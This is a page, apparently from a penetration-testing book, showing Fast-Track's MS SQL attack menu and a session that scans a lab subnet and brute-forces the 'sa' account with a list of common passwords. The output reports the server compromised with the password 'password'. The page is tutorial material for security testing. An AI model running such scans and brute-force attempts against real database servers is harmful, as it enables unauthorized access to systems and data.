170
Chapter 11
You can use and customize several options to reach your target, the easi-
est of which is the quick brute force, which will often go undetected. We’ll
select the quick brute force option using a subset of built-in passwords and
attempt to guess the password on the MS SQL server.
Enter the IP Address and Port Number to Attack.
Options: (a)ttempt SQL Ping and Auto Quick Brute Force
(m)ass scan and dictionary brute
(s)ingle Target (Attack a Single Target with big dictionary)
(f)ind SQL Ports (SQL Ping)
(i) want a command prompt and know which system is vulnerable
(v)ulnerable system, I want to add a local admin on the box...
(e)nable xp_cmdshell if its disabled (sql2k and sql2k5)
Enter Option:
a
Enter username for SQL database (example:sa):
sa
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.
Setting default directory...
Enter the IP Range to scan for SQL Scan (example 192.168.1.1-255):
10.211.55.1/24
Do you want to perform advanced SQL server identification on non-standard SQL
ports? This will use UDP footprinting in order to determine where the SQL
servers are at. This could take quite a long time.
Do you want to perform advanced identification, yes or no:
yes
[-] Launching SQL Ping, this may take a while to footprint.... [-]
[*] Please wait while we load the module tree...
Brute forcing username: sa
Be patient this could take awhile...
Brute forcing password of password2 on IP 10.211.55.128:1433
Brute forcing password of on IP 10.211.55.128:1433
Brute forcing password of password on IP 10.211.55.128:1433
SQL Server Compromised: "sa" with password of: "password" on IP
10.211.55.128:1433
Brute forcing password of sqlserver on IP 10.211.55.128:1433
Brute forcing password of sql on IP 10.211.55.128:1433
Brute forcing password of password1 on IP 10.211.55.128:1433
Brute forcing password of password123 on IP 10.211.55.128:1433
Brute forcing password of complexpassword on IP 10.211.55.128:1433
Brute forcing password of database on IP 10.211.55.128:1433
Brute forcing password of server on IP 10.211.55.128:1433
Brute forcing password of changeme on IP 10.211.55.128:1433
Brute forcing password of change on IP 10.211.55.128:1433
Brute forcing password of sqlserver2000 on IP 10.211.55.128:1433
Brute forcing password of sqlserver2005 on IP 10.211.55.128:1433